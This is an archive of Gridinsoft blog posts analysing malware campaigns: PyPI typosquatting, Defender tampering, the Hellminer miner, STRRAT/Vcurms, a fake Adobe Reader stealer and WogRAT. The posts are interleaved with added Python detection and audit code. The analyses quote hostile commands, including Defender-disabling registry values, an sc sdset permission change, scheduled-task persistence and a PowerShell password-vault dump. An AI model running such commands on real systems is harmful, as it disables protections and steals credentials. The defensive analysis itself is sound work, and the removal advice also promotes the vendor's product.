Malware Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/malware/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Last updated: Tue, 02 Apr 2024 01:20:04 +0000

PyPI Malware Spreading Outbreak Exploits Typosquatting
https://gridinsoft.com/blogs/pypi-malware-outbreak/
Fri, 29 Mar 2024 17:04:58 +0000

The post PyPI Malware Spreading Outbreak Exploits Typosquatting appeared first on Gridinsoft Blog.

PyPI, an index of Python packages, once again became a place for malware spreading. Threat actors registered hundreds of profiles to deploy packages, with the name set as typosquatting to known and popular packages. This forced the administration to halt new user registration until the issue is resolved.

PyPI Malware Spreading Causes Registrations Halt

Python Package Index, commonly known as PyPI, has closed the registration of new users due to a wave of malware spreading through the platform. Such trouble is nothing new, as similar infestations happened in the past. Each time, the platform implemented changes aimed at preventing malware uploads in the future, but the protection evidently failed this time. The research from CheckPoint uncovers the entire flow of the attack.

In the latest attack, cybercriminals uploaded not the final payload but a malicious script that loads the malware. The repositories with these scripts were generally uploaded on March 27, with the user accounts created the day before. Overall, the research unveils 576 malicious repositories.

Image: PyPI user profile that uploaded malware. Source: CheckPoint

Another thing that unites all these uploads is the use of typosquatting in their naming. The fraudsters were evidently aiming to spoof the names of popular packages. They particularly used symbol-numeric substitution (request5 instead of requests), common typos (requestss) and slight changes like -sdk or -v1 endings. While these look like obvious fakes, they may still work when users are in a hurry or distracted.
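The three naming patterns above are easy to screen for before installing a dependency. The following Python is an added example, not code from the post or from PyPI; the POPULAR set is a constructed sample standing in for a real top-downloads list.

```python
"""Heuristic typosquat check for package names (added example, not from the post).

Flags a candidate PyPI name that looks like a lookalike of a popular package
using the three patterns described above: symbol-numeric substitution
(request5), an extra or doubled letter (requestss), and added endings such
as -sdk or -v1. POPULAR is a constructed sample, not the real top-downloads list.
"""
import re
from typing import Iterable, Optional

# Constructed sample of well-known package names (assumption: a real check
# would load the top-N downloaded packages).
POPULAR = {"requests", "numpy", "pandas", "urllib3", "setuptools", "django"}

# Digits that attackers swap in for visually similar letters.
LEET_MAP = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t", "8": "b"})

# Endings that make a fake name look like an official variant of the real one.
SUFFIXES = ("-sdk", "-v1", "-v2", "-py", "-python", "-dev", "-lib")


def normalize(name: str) -> str:
    """PEP 503 normalization: case-insensitive, runs of '-', '_' and '.' collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; package names are short, so O(len(a)*len(b)) is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_risk(candidate: str, popular: Iterable[str] = POPULAR) -> Optional[str]:
    """Return a short reason if `candidate` looks like a typosquat of a popular
    package, or None if it is a popular package itself or unrelated."""
    popular = {normalize(p) for p in popular}
    name = normalize(candidate)
    if name in popular:
        return None  # the genuine package, not a lookalike
    # 1. a known ending appended to a popular name (requests-sdk, requests-v1)
    for suffix in SUFFIXES:
        if name.endswith(suffix) and name[: -len(suffix)] in popular:
            return f"suffix {suffix!r} appended to {name[: -len(suffix)]!r}"
    # 2. digits standing in for letters (request5 -> requests)
    deleet = name.translate(LEET_MAP)
    if deleet != name and deleet in popular:
        return f"digit substitution for {deleet!r}"
    # 3. one keystroke away: doubled, dropped or swapped letter (requestss)
    for real in popular:
        if edit_distance(name, real) == 1:
            return f"one edit away from {real!r}"
    return None
```

Run over a requirements file, every non-None result is a name worth checking against the index by hand before `pip install`.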

Package indexes for different programming languages are often a target of cybercriminals’ attention. Ones the size of PyPI, which boasts over 800,000 users, are a Mecca for hackers. By spreading malware in packages, they can infect both users and developers, potentially gaining a starting point for a cyberattack on a corporation, or even for a supply chain attack. Considering the wide use of Python in machine learning, this can also be leveraged for attacks on ML clusters. The latter appears to be a new point of interest for cybercriminals.

Malware in PyPI: How Does It Work?

Despite the scale of the attack, the way it works is nothing special. As I’ve said, the malicious repositories did not contain the actual malware but an obfuscated loader script. The latter connected to the command server – funcaptcha[.]ru – and pulled the payload.

All the repos were spreading the same script, which deployed the same malware regardless of the region: an infostealer and a cryptojacker, both in the form of obfuscated code. Neither of them, however, belongs to any known malware family; they were likely developed for this specific attack campaign.

Image: Piece of code of the infostealer malware spread in this campaign

The infostealer targets passwords stored in browser files and session tokens of popular desktop applications. Additionally, it grabs browser cookies – another valuable source of user information. The cryptojacking malware modifies the desktop crypto wallets it detects, most likely changing the recipient of all transactions to the fraudsters’ wallet. After that, both malware samples communicate with the same C2 server as the loader script did.

Disclosure and Remediation

Shortly after uncovering the attack chain, PyPI administrators announced the suspension of all new user registrations. They then started searching for the affected repositories and deleting them, which corresponds to the tactics they used before. Still, this does not solve the problem of exclusively reactive action against such threats.

Despite being well-known and trusted, all large package repositories suffer from the very same problem. It is too hard to track all the uploads, and strict premoderation would queue new packages for weeks. The only variable here is which one will be the next to get the attention of adversaries. This eventually raises the question of self-defense for the developers who rely on these repos in their daily tasks.

The obvious advice here is to double-check all packages, regardless of their source. Malware receives more and more sophisticated disguises, becoming effective even against savvy and aware users. Good anti-malware software will be handy as well: a proper one will detect and prevent the execution of a malicious script before it starts its mischievous job.

VirTool:Win32/DefenderTamperingRestore
https://gridinsoft.com/blogs/virtoolwin32-defendertamperingrestore/
Mon, 25 Mar 2024 23:29:53 +0000

The post VirTool:Win32/DefenderTamperingRestore appeared first on Gridinsoft Blog.

VirTool:Win32/DefenderTamperingRestore is the name of a Microsoft Defender detection for a malicious element present in the system. Usually, it marks something that can weaken system security and make the device vulnerable to malware injection. Let’s find out how dangerous this is, and how to deal with it.

Threats like VirTool are often a sign of an ongoing malware attack. Such threats may carry embedded code that targets security tools, or use a stand-alone script. The fact that malicious software tries to disable antivirus tools usually means that its activities are hard to conceal, i.e. it is something harsh and severe. Ransomware, desktop blockers, vandal viruses, coin miners – all of them can make use of a defenceless system.

What is VirTool:Win32/DefenderTamperingRestore?

The VirTool:Win32/DefenderTamperingRestore detection points at a malignant element that can prevent Microsoft Defender from working properly. This includes various scripts, particularly ones that modify the registry keys that control the functioning of Defender. It is also triggered when you try to run scripts or download programs designed to subvert system defenses. VirTool is hidden from the user and runs in the background, which makes malware detection and removal more difficult.

Image: VirTool:Win32/DefenderTamperingRestore detection

Pirated software can also contain code that modifies system settings to bypass license restrictions without carrying malicious functionality. Pirated software may also include scripts that disable Microsoft Defender to prevent malicious components from being detected and removed.

Is VirTool:Win32/DefenderTamperingRestore a false positive?

Although VirTool:Win32/DefenderTamperingRestore usually indicates the presence of malicious activity, in some cases it may be the result of a false positive detection. This can happen if legitimate software or administrative scripts change security settings during standard operation or system maintenance.

Image: Users complaining about false positives

VirTool:Win32/DefenderTamperingRestore sometimes also appears in scenarios involving the use of Microsoft Safety Scanner (MSERT), which can identify and report changed settings as part of its scan, correcting them back to safer configurations.

DefenderTamperingRestore Analysis

As I said above, it specializes in modifying registry keys to disable Microsoft Defender or restrict its capabilities. This is mainly done through PowerShell or Command Prompt commands that modify system policies and specific Defender settings.

One particular thing that quite a few VirTool:Win32/DefenderTamperingRestore samples do is modify the registry values responsible for real-time and heuristic protection. Malware particularly goes for the “DisableRealtimeMonitoring” value to disable real-time protection, or modifies “DisableBehaviorMonitoring” to stop the tracking of suspicious activity.

Walking Through Affected Registry Keys

One of the main goals of VirTool is to disable Defender completely. Malware creates the “DisableAntiSpyware” value in the following key, setting it to 1, which stops Defender from running.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender

To disable proactive protection, VirTool creates another value – “DisableRealtimeMonitoring” – and sets it to 1. This stops the security tool from continuously scanning accessed folders and launched files.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection

A less common trick this thing pulls targets the automatic sample submission system. By setting the DontReportInfectionInformation value to 1 in the following registry key, it disables sending samples to Microsoft.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet
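The three policy keys walked through above can be audited offline from a `reg export` of the Policies hive. The Python below is an added example, not code from the post or from Microsoft; the sample export text is constructed and uses only the key and value names the post mentions.

```python
"""Audit a Defender policy export for the tampering values described above
(added example, not from the post).

The input is text in the .reg format produced by `reg export`; the sample
below is constructed and uses the key paths and value names named in the post.
"""
import re
from typing import Dict, List, Tuple

# Policy values the post describes. A DWORD of 1 means the protection is off
# (or, for Spynet, that sample submission is off).
TAMPER_VALUES = {
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender": (
        "DisableAntiSpyware",
    ),
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection": (
        "DisableRealtimeMonitoring",
        "DisableBehaviorMonitoring",
    ),
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet": (
        "DontReportInfectionInformation",
    ),
}

_KEY_RE = re.compile(r"^\[(.+)\]$")
_DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_reg_export(text: str) -> Dict[str, Dict[str, int]]:
    """Parse the [key] and "name"=dword:XXXXXXXX lines of a .reg export.
    Other value types (strings, binary) are ignored; they are not relevant here."""
    result: Dict[str, Dict[str, int]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1)
            result.setdefault(current, {})
            continue
        m = _DWORD_RE.match(line)
        if m and current is not None:
            result[current][m.group(1)] = int(m.group(2), 16)
    return result


def audit_defender_policy(reg: Dict[str, Dict[str, int]]) -> List[Tuple[str, str, int]]:
    """Return (key, value name, data) for every tampering value set to a
    non-zero DWORD. Names are compared case-insensitively, as the registry does."""
    findings = []
    lowered = {k.lower(): v for k, v in reg.items()}
    for key, names in TAMPER_VALUES.items():
        values = lowered.get(key.lower(), {})
        for name in names:
            for present, data in values.items():
                if present.lower() == name.lower() and data != 0:
                    findings.append((key, present, data))
    return findings


# Constructed sample export: Defender and real-time monitoring are switched off
# and sample submission is disabled, while behaviour monitoring is still on and
# an unrelated policy value (PUAProtection) is present and must not be reported.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001
"PUAProtection"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
"DisableRealtimeMonitoring"=dword:00000001
"DisableBehaviorMonitoring"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet]
"DontReportInfectionInformation"=dword:00000001
"""

if __name__ == "__main__":
    for key, name, data in audit_defender_policy(parse_reg_export(SAMPLE_EXPORT)):
        print(f"{key}\\{name} = {data}")
```

A real export from `reg export "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" out.reg` is UTF-16 encoded, so open it with `encoding="utf-16"` before passing the text in.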

Some of the things that Microsoft detects under this name reach a sky-high level of trickery with Windows commands. The confusing set of seemingly meaningless letters and symbols you can see below is in fact rather useful to the malware. It adds certain folders – particularly ones that malware uses – to the Microsoft Defender whitelist. Several ransomware samples use the same or similar commands while gaining persistence.

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

In rare cases, VirTool acted as a loader, downloading and executing additional malicious modules. It modified the “Shell” and “Userinit” registry values to execute malicious scripts at system startup. A much more common case, though, is this malicious element being embedded in a more complex script. The latter typically orchestrates the initial malware injection, in which disabling Microsoft Defender is a rather obvious preliminary step.

How to Remove VirTool:Win32/DefenderTamperingRestore?

The appearance of VirTool:Win32/DefenderTamperingRestore is usually a bad omen. It is likely a sign of malware activity that flies under the radar. In that case, I recommend following these steps:

1. Restart your computer into Safe Mode with Networking

Open the Start menu, then click the “Reboot” button while holding the Shift key. The troubleshooting menu will appear; select “Troubleshoot” → “Startup Settings” there and click “Restart”. This sends you to the window with Safe Mode options.

There, press the 5 key to launch Safe Mode with Networking. This mode stops all non-essential processes from launching, leaving you with bare Windows and network connectivity enabled. By doing so, you restrict malware from running, making the removal much easier to accomplish.

2. Run reliable antivirus software

Download reliable antivirus software that can remove VirTool remnants permanently from your PC. GridinSoft Anti-Malware is an excellent option for this. Run a Full Scan and remove any detected threats.

Hellminer.exe Coin Miner
https://gridinsoft.com/blogs/hellminer-exe-malware-analysis/
Fri, 22 Mar 2024 15:51:29 +0000

The post Hellminer.exe Coin Miner appeared first on Gridinsoft Blog.

Hellminer.exe is a process you can see in the Task Manager that indicates malicious software activity. It stands out by the high CPU load it creates, making the system much less responsive. Let’s figure out what this process is, and how to get rid of it.

Hellminer malware has the potential to attack a wide range of devices, from IoT to server clusters. The final goal of its activity is bringing profit to its masters with the use of your hardware. Ignoring the activity of this malicious program may lead to premature hardware failure and overall performance deterioration.

What is the Hellminer.exe process?

This is a process associated with a malicious coin miner. Such malware aims at exploiting the system’s hardware to mine cryptocurrencies, mainly DarkCoin and Monero. To maximize profits, the hackers behind this malware establish huge networks of infected computers. Hellminer takes up to 80% of CPU power in order to get substantial mining performance, making the system sluggish and uncomfortable to use.

Image: Hellminer.exe process in Task Manager

Malicious miners like this one typically get into user systems through malvertising on the Web, or with the use of dropper malware. Both distribution methods, though, are commonly used by other malware, which means there is a risk that Hellminer is not the only infection running in the system.

This malware appears to be different from other miners, as it is not based on XMRig, the popular open-source mining software. Instead, it appears to be written in Python, and is likely a private development. Let’s check out the other interesting things I’ve found during the analysis.

Hellminer Malware Analysis

It is not completely clear how Hellminer gets into the system; I suspect it is not much different from how miner malware typically spreads – via dropper malware and malvertising. After launch, the malware begins with a selection of anti-VM and anti-debug checks.

Image: Hellminer execution chain

Using calls to WMI, it gets information about the CPU, trying to find any signs of virtualization. The reason I don’t think this is mere information gathering is that the very next step is listing services and processes: Hellminer specifically seeks traces of the VMWare virtualization environment. After these checks, the main payload is unfolded. Still, the malware may also use the information collected at this stage to configure the mining process or as part of the system fingerprint.

wmic cpu get Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer /format:list

Fingerprinting starts with another call to WMIC, wmic os get Version. The malware retrieves quite a basic, if not scarce, set of data – just information about the operating system. After that, it gains persistence through another command and a series of changes in the Windows registry.

%windir%\System32\svchost.exe -k WerSvcGroup – starting the Windows Error Reporting service to make it run the malware. This increases the level of privileges the malicious program has, while also providing it with a disguise.

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security – changing network security policies.

The final round of persistence involves another call to WMI, specifically to its Adaptation Service. Hellminer forces it to recursively launch the payload, ensuring continuous execution. This specific command is also part of resource allocation for the mining process.

wmiadap.exe /F /T /R

Command Server Connectivity

Like other miner malware, Hellminer does not have any extensive C2 communication. After finishing the steps above, it sends a blob of system information to the command server, effectively notifying it about its readiness. The C2 returns a configuration file, which specifies the mining pool and the IP address to connect to.

Still, there is one thing that catches the eye – the form of the command servers used by this malware. They do not look like C2 servers of the classic model; instead, the network is peer-to-peer. In such a network, the role of command server is given to one of the infected computers. The “real” server sporadically communicates with that one, retrieving information about new devices and assigning the next system to take the C2 role. This drastically increases the resilience of the network, making it particularly hard to disrupt by taking down the command server.

During the analysis, I’ve detected these command servers:

Hellminer.exe Removal Guide

Removing Hellminer malware requires an anti-malware software scan. Such threats typically duplicate themselves to numerous folders across the system, with each copy acting as a backup. GridinSoft Anti-Malware will remove the malicious miner and all its copies in a matter of minutes. Launch a Full Scan and let it finish – this will make sure your system is as good as new.

Miner malware activity always correlates with cryptocurrency prices. At the moment, they are on the rise, meaning that more and more fraudsters will opt for this malware. The typical way malicious miners spread is malvertising, particularly in search engines. Avoiding it requires user attention: such ads typically mimic legitimate sites that distribute freeware, but always have a different, mangled URL.

STRRAT and Vcurms Malware Abuse GitHub for Spreading
https://gridinsoft.com/blogs/strrat-and-vcurms-abuse-github/
Fri, 22 Mar 2024 12:04:00 +0000

The post STRRAT and Vcurms Malware Abuse GitHub for Spreading appeared first on Gridinsoft Blog.

A new phishing campaign has recently been discovered that uses GitHub to deliver the Remote Access Trojans (RATs) STRRAT and Vcurms via a malicious Java downloader. ANY.RUN specialists have detected the active spread of these malicious programs and warn users about the potential threat.

Briefly About STRRAT and Vcurms

STRRAT is a Java-based RAT notorious for its ability to steal information. It is primarily used to gather credentials from browsers and email clients, log keystrokes, and provide backdoor access to infected systems. Like other remote access trojans, STRRAT relies on the stealth of its operations and on detection evasion.

Image: Phishing email with a pop-up notification about launching the JAR file

Vcurms is another Java-based RAT, but with distinct operational tactics. It communicates with its command-and-control server via a Proton Mail email address and executes commands received through specific email subject lines. This malware carries infostealer functionality, capable of extracting data from applications like Discord and Steam. Aside from this, it can grab credentials, cookies, and autofill data from multiple web browsers. It shares similarities with another malware known as Rude Stealer.

Attack Overview

ANY.RUN researchers say the attack begins with a phishing email convincing recipients to click a button to verify payment information. This leads to the download of a malicious JAR file masquerading as a payment receipt. The downloaded file then launches two additional JAR files that activate both the Vcurms and STRRAT trojans.

Image: Infection chain of the malware

Both malware samples try to remain stealthy, using detection and analysis evasion techniques. Researchers found them using these specific tricks:

  • Using legitimate services and tools – attackers use legitimate cloud platforms such as AWS and GitHub to store or distribute malware. This trick also complicates filtering network requests of malicious origin.
  • Code obfuscation – the source code of a program is converted into a form that makes it difficult to read. This is used to hide malicious functions from antivirus scanners and analysts. (By the way, the first JAR file received via email is obfuscated and downloads malware using a PowerShell command.)
  • Packing – malicious code is compressed or “packed” together with some type of unpacking mechanism. This makes it difficult to analyze the code without executing the malware.

This is not the first time malware actors abuse GitHub or other developer platforms. Unfortunately, there are not a lot of options to mitigate this proactively: it is easy to masquerade the code and make it look innocent. GitLab administrators reacted to user complaints and removed the malicious repository, but this does not guarantee that there won’t be a comeback.

Sandbox attack analysis

The phishing campaign begins by spreading the initial loader via phishing emails. The goal of these emails is to convince the user to download and run a malicious JAR file. This file acts as the primary loader that initiates a series of malicious actions on the infected machine.

Primary Loader

Once launched, the primary loader downloads a secondary malicious file from the aforementioned repository on GitHub. The file is launched with a command that invokes the Java runtime:

"C:\Program Files\Java\jre1.8.0_271\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\64e8cb522a3a4664791c27512d94a911bc2fbcbae09b625976ff8ac6809819d3.jar"

Persistence and disguise

Then, the malware creates a copy of itself in the AppData\Roaming directory and registers a task in the Windows scheduler to automatically restart it every 30 minutes. Interestingly enough, the malware tries to mimic the Skype application, judging by the name of the task it creates. This ensures the persistence of the malware on the system.

cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\admin\AppData\Roaming\64e8cb522a3a4664791c27512d94a911bc2fbcbae09b625976ff8ac6809819d3.jar"

Collecting information about the system

Next, the malware gathers information about the system, including a list of disks and the presence of installed security programs, using the following commands:

cmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_logicaldisk get volumeserialnumber /format:list"
cmd.exe /c "wmic /node:localhost /namespace:'\\root\securitycenter2' path antivirusproduct get displayname /format:list"

One of the malware programs, in this case Vcurms, uses a PowerShell command to dump the passwords kept by Windows itself rather than by third-party tools. Obviously, it gathers data from browsers too, but in a different manner – by accessing their data files directly.

powershell.exe "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }"

I assume this command is related to Vcurms as STRRAT does not exhibit password stealing functionality.

Strengthening cybersecurity

This case shows the importance of vigilance and cooperation in cybersecurity. The phishing attack demonstrates that even trusted platforms like GitHub can be used as a tool to spread malware. Cybersecurity experts offer the following tips to protect against such threats:

  • Firstly, always verify the sender and avoid opening attachments or clicking on links in emails that seem suspicious or unexpected. If an email asks you to confirm payment details or personal information, it is better to contact the sender directly through another channel.
  • Then, enable spam filters on your email to reduce the number of phishing and junk emails reaching your inbox.
  • Make sure your antivirus software and all systems are updated to the latest versions. Regular updates help protect against known threats and vulnerabilities.
  • Also, regularly monitor systems for suspicious activity and respond quickly to cybersecurity incidents. Use analytics and intelligent detection tools.
  • And last, back up important data regularly and store it in a safe place. This will help you recover information in the event of a successful attack.

Adobe Reader Infostealer Plagues Email Messages in Brazil
https://gridinsoft.com/blogs/adobe-reader-infostealer-targets-brazil/
Tue, 12 Mar 2024 19:26:13 +0000

The post Adobe Reader Infostealer Plagues Email Messages in Brazil appeared first on Gridinsoft Blog.

A recent email spam campaign reportedly spreads infostealer malware under the guise of an Adobe Reader installer. Within a forged PDF document, there is a request to install the Adobe Reader app that triggers the malware download and installation. Considering the language of the said documents, this malicious activity mainly targets Portugal and Brazil.

Infostealer Spreads in Fake Adobe Reader Installers

The recent attack campaign detected by ASEC Intelligence Center starts with email spam. The messages have a PDF file attached, with its contents in Portuguese. This seriously narrows down the list of countries the campaign is targeting – to Brazil and Portugal. Inside the file, there is a pop-up prompt to install Adobe Reader, which is allegedly required to open the document. A short side note: modern web browsers can handle PDFs of any complexity with ease.

Following the document’s instruction triggers the download of a file named Reader_Install_Setup.exe, which obviously mimics a legitimate installation file of the program. It even copies the icon, which makes the fraud even harder to recognize at this stage. Running this file, which is in fact a loader, initiates the malware execution.

Image: Fake Adobe Reader installer

However, it does not happen instantly – the malware performs a series of actions to pull off a DLL hijack and run the final payload with the maximum privileges possible. First, it spawns an executable file, drops a DLL that contains the actual payload and runs the msdt.exe process. The latter is a genuine Windows diagnostics tool that the malware uses to call for a subordinate service.

"C:\Windows\SysWOW64\msdt.exe" -path "C:\WINDOWS\diagnotics\index\BluetoothDiagnostic.xml" -skip yes – the command used to call MSDT, specifically its Bluetooth Diagnostic tool

This service will consequently load the malicious DLL I’ve mentioned above. The library, in turn, runs the said executable file, legitimizing the infostealer and providing it with maximum privileges.
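The command lines quoted in the Hellminer analysis (the wmic cpu query, svchost -k WerSvcGroup, wmiadap.exe /F /T /R), in the STRRAT/Vcurms analysis (the schtasks persistence task, the SecurityCenter2 query, the PasswordVault dump) and in the passage above (msdt.exe started by the loader) are what a process-creation rule set keys on. The Python below is an added example, not code from any of the posts or from ANY.RUN/ASEC; the events are constructed Sysmon-style records, and the parent-process conditions (svchost not spawned by services.exe, msdt.exe spawned from outside C:\Windows) are my own assumptions rather than something the posts state.

```python
"""Match process-creation events against the command lines these posts describe
(added example, not from the posts).

Each event is a constructed dict with the image path, the command line and the
parent image, as a Sysmon event 1 or an EDR process log would provide.
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]


def _ci(pattern: str):
    """Compile a case-insensitive regex (Windows command lines are case-insensitive)."""
    return re.compile(pattern, re.IGNORECASE)


# (rule name, predicate). Predicates see the whole event so they can combine the
# command line with the parent image; parent conditions are assumptions, see lead-in.
RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("wmic CPU query used for anti-VM checks (Hellminer)",
     lambda e: bool(_ci(r"\bwmic\b.*\bcpu\s+get\b").search(e["cmd"]))),
    ("wmiadap forced provider refresh (Hellminer)",
     lambda e: bool(_ci(r"wmiadap(\.exe)?\s+/F\s+/T\s+/R").search(e["cmd"]))),
    ("svchost -k WerSvcGroup not started by services.exe (Hellminer)",
     lambda e: bool(_ci(r"svchost(\.exe)?\s+-k\s+WerSvcGroup").search(e["cmd"]))
     and not e["parent"].lower().endswith("\\services.exe")),
    ("scheduled task running a JAR from the user profile (STRRAT/Vcurms)",
     lambda e: bool(_ci(r'schtasks\s+/create\b.*/tr\s+"?[^"]*\\AppData\\[^"]*\.jar').search(e["cmd"]))),
    ("installed AV enumeration via SecurityCenter2 (STRRAT/Vcurms)",
     lambda e: bool(_ci(r"\bwmic\b.*securitycenter2.*antivirusproduct").search(e["cmd"]))),
    ("PasswordVault dump from PowerShell (Vcurms)",
     lambda e: bool(_ci(r"Windows\.Security\.Credentials\.PasswordVault").search(e["cmd"]))),
    ("msdt.exe launched by a process outside C:\\Windows (Adobe Reader loader)",
     lambda e: bool(_ci(r'\\msdt\.exe"?\s+-path\b').search(e["cmd"]))
     and not e["parent"].lower().startswith("c:\\windows\\")),
]


def match_rules(event: Event) -> List[str]:
    """Names of every rule the event triggers (empty list for benign events)."""
    return [name for name, pred in RULES if pred(event)]


def scan(events: List[Event]) -> Dict[int, List[str]]:
    """Map event index -> triggered rule names, only for events that hit something."""
    hits: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        names = match_rules(ev)
        if names:
            hits[i] = names
    return hits


# Constructed sample events. 0-6 carry the command lines quoted in the posts
# (with a placeholder JAR name); 7 and 8 are benign look-alikes that must not fire.
JAVAW = r"C:\Program Files\Java\jre1.8.0_271\bin\javaw.exe"
MINER = r"C:\Users\admin\AppData\Local\Temp\hellminer.exe"  # placeholder path
SAMPLE_EVENTS: List[Event] = [
    {"image": r"C:\Windows\System32\wbem\WMIC.exe", "parent": MINER,
     "cmd": "wmic cpu get Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer /format:list"},
    {"image": r"C:\Windows\System32\wbem\wmiadap.exe", "parent": MINER, "cmd": "wmiadap.exe /F /T /R"},
    {"image": r"C:\Windows\System32\svchost.exe", "parent": MINER,
     "cmd": r"%windir%\System32\svchost.exe -k WerSvcGroup"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": JAVAW,
     "cmd": r'cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\admin\AppData\Roaming\payload.jar"'},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": JAVAW,
     "cmd": r'''cmd.exe /c "wmic /node:localhost /namespace:'\\root\securitycenter2' path antivirusproduct get displayname /format:list"'''},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": JAVAW,
     "cmd": 'powershell.exe "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }"'},
    {"image": r"C:\Windows\SysWOW64\msdt.exe", "parent": r"C:\Users\admin\Downloads\Reader_Install_Setup.exe",
     "cmd": r'"C:\Windows\SysWOW64\msdt.exe" -path "C:\WINDOWS\diagnotics\index\BluetoothDiagnostic.xml" -skip yes'},
    # benign: the WER service host started normally by the service control manager
    {"image": r"C:\Windows\System32\svchost.exe", "parent": r"C:\Windows\System32\services.exe",
     "cmd": r"C:\Windows\System32\svchost.exe -k WerSvcGroup"},
    # benign: an administrator listing disks; not one of the quoted queries
    {"image": r"C:\Windows\System32\wbem\WMIC.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "wmic logicaldisk get name,size"},
]

if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["cmd"][:60], "->", "; ".join(names))
```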

Stealer Malware Analysis

Even though the malware used in the campaign appears to be unique and does not belong to any known malware family, its functionality can barely be called unusual. This infostealer gathers basic information about the system, sends it to the command server and then creates a directory to store the collected data. The malware adds the latter to the list of Microsoft Defender exclusions so that Defender will not disrupt its operations. It also mimics a legitimate Chrome folder by adding a fake executable file and some of the files typical of a genuine browser folder.

Image: A fake browser folder created by the infostealer to keep the collected data

The C2 servers used by some of the samples confirm the targeting hypothesis I’ve mentioned above. Hxxps://thinkforce.com[.]br/ and hxxps://blamefade.com[.]br/ receive the AutoFill data from all the browsers. While this is less than what modern infostealers typically gather, it is still sensitive – browsers keep almost all of our passwords.

How to protect against infostealer malware?

Information stealers were never an underdog of the malware world, and they remain a potent threat regardless of the circumstances. However, even though their samples may feature outstanding anti-detection tricks, they still need to get in. And this is where you can avoid them most effectively.

Be careful with emails. Email spam is probably going to be the most widespread malware delivery method of this decade. Users tend to believe its content or simply ignore the related risks, which inevitably leads to malware infection. Seeing such a sketchy offer to install a long-forgotten app, or to perform an action that is not normally needed with this type of document, should raise suspicion. At the same time, the texts of such messages may be ridiculous enough to make the fraud apparent.

Use official software sources. Certain files do require specific software, but try to use only official distributions of it. Going to the developer’s site and downloading it there takes little longer than clicking a link.

Have decent anti-malware software on hand. Malware finds new spreading ways pretty much every day. To avoid falling victim to the trickiest sample, software that will not allow it to get in is essential. GridinSoft Anti-Malware is a program that will provide you with real-time protection and network filters with hourly updates. This security tool will make sure that malware will not even launch in the first place.

The post Adobe Reader Infostealer Plagues Email Messages in Brazil appeared first on Gridinsoft Blog.

WingsOfGod.dll – WogRAT Malware Analysis & Removal
https://gridinsoft.com/blogs/wograt-wingsofgod-analysis-removal/
Fri, 08 Mar 2024 17:17:12 +0000

The post WingsOfGod.dll – WogRAT Malware Analysis & Removal appeared first on Gridinsoft Blog.
WogRAT, also known as WingsOfGod RAT, is a novel remote access trojan that attacks users in Asian countries. Named after its own file, Wingsofgod.dll, this malware has been attacking people since late 2022, spreading through an online notepad service.

What is WogRAT (WingsOfGod.dll)?

WogRAT is a classic example of a remote access trojan, a backdoor-like malicious program that focuses on providing remote access to the infected system. ASEC researchers were the first to detect and track the campaign. They additionally emphasize that this malicious program primarily targets Asian countries: China, Japan, Singapore and Hong Kong in the first place.

